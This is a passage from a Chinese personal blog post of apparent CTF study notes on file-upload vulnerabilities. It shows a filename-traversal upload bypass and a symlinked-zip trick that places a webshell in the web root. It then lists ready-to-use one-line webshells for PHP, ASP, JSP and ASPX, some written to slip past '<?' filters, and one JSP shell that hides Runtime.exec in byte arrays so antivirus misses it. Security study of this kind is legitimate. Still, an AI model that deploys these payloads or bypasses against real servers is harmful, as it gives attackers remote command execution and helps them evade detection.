<p>形式：上传的文件会被解析为日志不能执行，给出了<code>/uploads/xxx.php</code>路径并且可以查询</p>
<p>绕过：上传文件的时候抓包，修改文件名（filename）为<code>./../../../../flag</code>，上传成功后路径变为<code>/uploads/./../../../../flag</code>即可进行目录穿越</p>
</blockquote>
<h2 id="攻击代码"><a href="#攻击代码" class="headerlink" title="攻击代码 #"></a>攻击代码 <a target="_blank" rel="noopener" href="https://wiki.wgpsec.org/knowledge/ctf/uploadfile.html#%E6%94%BB%E5%87%BB%E4%BB%A3%E7%A0%81">#</a></h2><h2 id="文件压缩："><a href="#文件压缩：" class="headerlink" title="文件压缩："></a>文件压缩：</h2><p>软链接压缩包，然后上传到软链接下，放🐎进行攻击</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">ln -s /var/www/html web  #创建软链接文件夹</span><br><span class="line">zip -y zip.zip web   #将软链接压缩生成一个zip.zip</span><br><span class="line"></span><br><span class="line">再在web下面放一个shell.php（🐎） </span><br><span class="line">zip -y z.zip web   #再生成一个带🐎的压缩包</span><br><span class="line"></span><br><span class="line">然后上传zip.zip，将上传路径改到可控目录/var/www/html</span><br><span class="line">然后上传z.zip，即传到了，显示的网页下（var/www/html/shell.php）</span><br><span class="line">蚁剑</span><br></pre></td></tr></table></figure>



<h3 id="常用攻击代码"><a href="#常用攻击代码" class="headerlink" title="常用攻击代码 #"></a>常用攻击代码 <a target="_blank" rel="noopener" href="https://wiki.wgpsec.org/knowledge/ctf/uploadfile.html#%E5%B8%B8%E7%94%A8%E6%94%BB%E5%87%BB%E4%BB%A3%E7%A0%81">#</a></h3><blockquote>
<p>简单的一句话木马</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php @eval($_POST[&#x27;cmd&#x27;]);?&gt;</span><br></pre></td></tr></table></figure>



<p>绕过<code>&lt;?</code>限制的一句话木马</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script language = &#x27;php&#x27;&gt;@eval($_POST[cmd]);&lt;/script&gt;</span><br></pre></td></tr></table></figure>



<p>绕过<code>&lt;?php ?&gt;</code>限制的一句话木马</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;?= @eval($_POST[&#x27;cmd&#x27;]);</span><br></pre></td></tr></table></figure>



<p>asp一句话木马</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;%eval(Request.Item[&quot;cmd&quot;],”unsafe”);%&gt;</span><br></pre></td></tr></table></figure>



<p>JSP一句话木马</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;%if(request.getParameter(&quot;f&quot;)!=null)(newjava.io.FileOutputStream (application.getRealPath(&quot;\\&quot;)+request.getParameter(&quot;f&quot;))).write (request.getParameter(&quot;t&quot;).getBytes());%&gt;</span><br></pre></td></tr></table></figure>

<p>JSP一句话免杀（ASCLL编码）</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">&lt;%@ page contentType=&quot;text/html;charset=UTF-8&quot;  language=&quot;java&quot; %&gt;</span><br><span class="line">&lt;%</span><br><span class="line">    if(request.getParameter(&quot;cmd&quot;)!=null)&#123;</span><br><span class="line">        Class rt = Class.forName(new String(new byte[] &#123; 106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 82, 117, 110, 116, 105, 109, 101 &#125;));</span><br><span class="line">        Process e = (Process) rt.getMethod(new String(new byte[] &#123; 101, 120, 101, 99 &#125;), String.class).invoke(rt.getMethod(new String(new byte[] &#123; 103, 101, 116, 82, 117, 110, 116, 105, 109, 101 &#125;)).invoke(null), request.getParameter(&quot;cmd&quot;) );</span><br><span class="line">        java.io.InputStream in = e.getInputStream();</span><br><span class="line">        int a = -1;byte[] b = new byte[2048];out.print(&quot;&lt;pre&gt;&quot;);</span><br><span class="line">        while((a=in.read(b))!=-1)&#123; out.println(new String(b)); &#125;out.print(&quot;&lt;/pre&gt;&quot;);</span><br><span class="line">    &#125;</span><br><span class="line">%&gt;</span><br></pre></td></tr></table></figure>

<p>ASPX一句话</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script language=&quot;C#&quot;runat=&quot;server&quot;&gt;WebAdmin2Y.x.y a=new WebAdmin2Y.x.y(&quot;add6bb58e139be10&quot;)&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<p>1</p>
</blockquote>
<h3 id="其它攻击代码"><a href="#其它攻击代码" class="headerlink" title="其它攻击代码 #"></a>其它攻击代码 <a target="_blank" rel="noopener" href="https://wiki.wgpsec.org/knowledge/ctf/uploadfile.html#%E5%85%B6%E5%AE%83%E6%94%BB%E5%87%BB%E4%BB%A3%E7%A0%81">#</a></h3><blockquote>
<p>异或取反等操作写shell的php脚本、混淆木马、不死马。</p>
</blockquote>
<h2 id="更多参考"><a href="#更多参考" class="headerlink" title="更多参考 #"></a>更多参考 <a target="_blank" rel="noopener" href="https://wiki.wgpsec.org/knowledge/ctf/uploadfile.html#%E6%9B%B4%E5%A4%9A%E5%8F%82%E8%80%83">#</a></h2><p><a target="_blank" rel="noopener" href="https://bbs.ichunqiu.com/thread-41672-1-1.html?from=sec">https://bbs.ichunqiu.com/thread-41672-1-1.html?from=sec</a></p>
<p><a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/web/253698.html">https://www.freebuf.com/articles/web/253698.html</a></p>
<p><a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/web/179954.html">https://www.freebuf.com/articles/web/179954.html</a></p>

    </div>

    
    
    
        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者： </strong>chleynx
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="https://chensonghi.github.io./2023/10/10/file_upload/" title="文件上传">https://chensonghi.github.io./2023/10/10/file_upload/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>


      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/2023-upload/" rel="tag"># 2023 upload</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2023/10/08/hello-world/" rel="prev" title="Hello World">
      <i class="fa fa-chevron-left"></i> Hello World
    </a></div>
      <div class="post-nav-item">
    <a href="/2023/10/20/SQL%E6%B3%A8%E5%85%A5/" rel="next" title="SQL注入">
      SQL注入 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  




          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%89%8D%E7%AB%AF%E7%BB%95%E8%BF%87"><span class="nav-number">1.</span> <span class="nav-text">前端绕过</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%90%8E%E7%AB%AF%E7%BB%95%E8%BF%87"><span class="nav-number">2.</span> <span class="nav-text">后端绕过</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%87%BD%E6%95%B0%E7%89%B9%E6%80%A7"><span class="nav-number">2.1.</span> <span class="nav-text">函数特性</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%85%B6%E5%AE%83"><span class="nav-number">2.1.0.0.1.</span> <span class="nav-text">其它</span></a></li></ol></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%9C%8D%E5%8A%A1%E7%AB%AF%E6%A3%80%E6%B5%8B%EF%BC%88MINE%E7%B1%BB%E5%9E%8B%E6%A3%80%E6%B5%8B%EF%BC%89"><span class="nav-number">2.1.1.</span> <span class="nav-text">服务端检测（MINE类型检测） </span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%9C%8D%E5%8A%A1%E7%AB%AF%E6%A3%80%E6%B5%8B%EF%BC%88%E7%9B%AE%E5%BD%95%E8%B7%AF%E5%BE%84%E6%A3%80%E6%B5%8B%EF%BC%89"><span class="nav-number">2.1.2.</span> <span class="nav-text">服务端检测（目录路径检测） </span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%9C%8D%E5%8A%A1%E7%AB%AF%E6%A3%80%E6%B5%8B%EF%BC%88%E6%96%87%E4%BB%B6%E6%89%A9%E5%B1%95%E5%90%8D%E6%A3%80%E6%B5%8B%EF%BC%89"><span class="nav-number">2.1.3.</span> <span class="nav-text">服务端检测（文件扩展名检测） </span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%96%87%E4%BB%B6%E6%88%AA%E6%96%AD%E7%BB%95%E8%BF%87%E6%94%BB%E5%87%BB"><span class="nav-number">2.1.4.</span> <span class="nav-text">文件截断绕过攻击 </span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%A7%A3%E6%9E%90%E6%BC%8F%E6%B4%9E%E6%94%BB%E5%87%BB"><span class="nav-number">2.1.5.</span> <span class="nav-text">解析漏洞攻击 </span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%9B%AE%E5%BD%95%E8%A7%A3%E6%9E%90"><span class="nav-number">2.1.5.1.</span> <span class="nav-text">目录解析 </span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%96%87%E4%BB%B6%E8%A7%A3%E6%9E%90"><span class="nav-number">2.1.5.2.</span> <span class="nav-text">文件解析 </span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Apache%E8%A7%A3%E6%9E%90%E6%BC%8F%E6%B4%9E"><span class="nav-number">2.1.5.3.</span> <span class="nav-text">Apache解析漏洞 </span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Nginx%E8%A7%A3%E6%9E%90%E6%BC%8F%E6%B4%9E"><span class="nav-number">2.1.5.4.</span> <span class="nav-text">Nginx解析漏洞 </span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#IIS7-5%E8%A7%A3%E6%9E%90%E6%BC%8F%E6%B4%9E"><span class="nav-number">2.1.5.5.</span> <span class="nav-text">IIS7.5解析漏洞 </span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%AB%9E%E4%BA%89%E6%9D%A1%E4%BB%B6%E6%94%BB%E5%87%BB"><span class="nav-number">2.1.6.</span> <span class="nav-text">竞争条件攻击 </span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%8F%8C%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0"><span class="nav-number">2.1.7.</span> <span class="nav-text">双文件上传 </span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#php3457"><span class="nav-number">2.1.8.</span> <span class="nav-text">php3457 </span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#htaccess%E6%96%87%E4%BB%B6%E6%94%BB%E5%87%BB"><span class="nav-number">2.1.9.</span> <span class="nav-text">.htaccess文件攻击 </span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%9C%8D%E5%8A%A1%E5%99%A8%E6%A3%80%E6%B5%8B%EF%BC%88%E6%96%87%E4%BB%B6%E5%86%85%E5%AE%B9%E6%A3%80%E6%B5%8B%EF%BC%89"><span class="nav-number">2.1.10.</span> <span class="nav-text">服务器检测（文件内容检测） </span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%96%87%E4%BB%B6%E5%B9%BB%E6%95%B0%E6%A3%80%E6%B5%8B%EF%BC%88%E6%96%87%E4%BB%B6%E5%BC%80%E5%A4%B4%EF%BC%89"><span class="nav-number">2.1.10.1.</span> <span class="nav-text">文件幻数检测（文件开头） </span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%96%87%E4%BB%B6%E7%9B%B8%E5%85%B3%E4%BF%A1%E6%81%AF%E6%A3%80%E6%B5%8B"><span class="nav-number">2.1.10.2.</span> <span class="nav-text">文件相关信息检测 </span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E4%B8%AD%E7%9A%84%E7%9B%AE%E5%BD%95%E7%A9%BF%E8%B6%8A%E6%BC%8F%E6%B4%9E"><span class="nav-number">2.1.11.</span> <span class="nav-text">文件上传中的目录穿越漏洞 </span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%94%BB%E5%87%BB%E4%BB%A3%E7%A0%81"><span class="nav-number">2.2.</span> <span class="nav-text">攻击代码 </span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%96%87%E4%BB%B6%E5%8E%8B%E7%BC%A9%EF%BC%9A"><span class="nav-number">2.3.</span> <span class="nav-text">文件压缩：</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%B8%B8%E7%94%A8%E6%94%BB%E5%87%BB%E4%BB%A3%E7%A0%81"><span class="nav-number">2.3.1.</span> <span class="nav-text">常用攻击代码 </span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%85%B6%E5%AE%83%E6%94%BB%E5%87%BB%E4%BB%A3%E7%A0%81"><span class="nav-number">2.3.2.</span> <span class="nav-text">其它攻击代码 </span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%9B%B4%E5%A4%9A%E5%8F%82%E8%80%83"><span class="nav-number">2.4.</span> <span class="nav-text">更多参考 </span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="chleynx"
      src="/images/ch.jpg">
  <p class="site-author-name" itemprop="name">chleynx</p>
  <div class="site-description" itemprop="description">不是看到希望才坚持，而是坚持了才能看到希望</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">12</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">5</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/chensonghi/chensonghi.github.io/" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;chensonghi&#x2F;chensonghi.github.io&#x2F;" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://blog.csdn.net/c582037" title="CSDN → https:&#x2F;&#x2F;blog.csdn.net&#x2F;c582037" rel="noopener" target="_blank"><i class="codiepie fa-fw"></i>CSDN</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 2023-10-8 – 
  <span itemprop="copyrightYear">2024</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">chleynx</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>


    <script async src="//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

    <span id="busuanzi_container_site_pv">总访问量<span id="busuanzi_value_site_pv"></span>次</span>
    <span class="post-meta-divider">|</span>
    <span id="busuanzi_container_site_uv">总访客数<span id="busuanzi_value_site_uv"></span>人</span>
    <span class="post-meta-divider">|</span>
<!-- 不蒜子计数初始值纠正 -->
<script>
$(document).ready(function() {

    var int = setInterval(fixCount, 50);  // 50ms周期检测函数
    var countOffset = 20000;  // 初始化首次数据

    function fixCount() {            
       if (document.getElementById("busuanzi_container_site_pv").style.display != "none")
        {
            $("#busuanzi_value_site_pv").html(parseInt($("#busuanzi_value_site_pv").html()) + countOffset); 
            clearInterval(int);
        }                  
        if ($("#busuanzi_container_site_pv").css("display") != "none")
        {
            $("#busuanzi_value_site_uv").html(parseInt($("#busuanzi_value_site_uv").html()) + countOffset); // 加上初始数据 
            clearInterval(int); // 停止检测
        }  
    }
       	
});
</script> 


        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  
  <script color='0,0,255' opacity='0.3' zIndex='-1' count='99' src="/lib/canvas-nest/canvas-nest.min.js"></script>
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
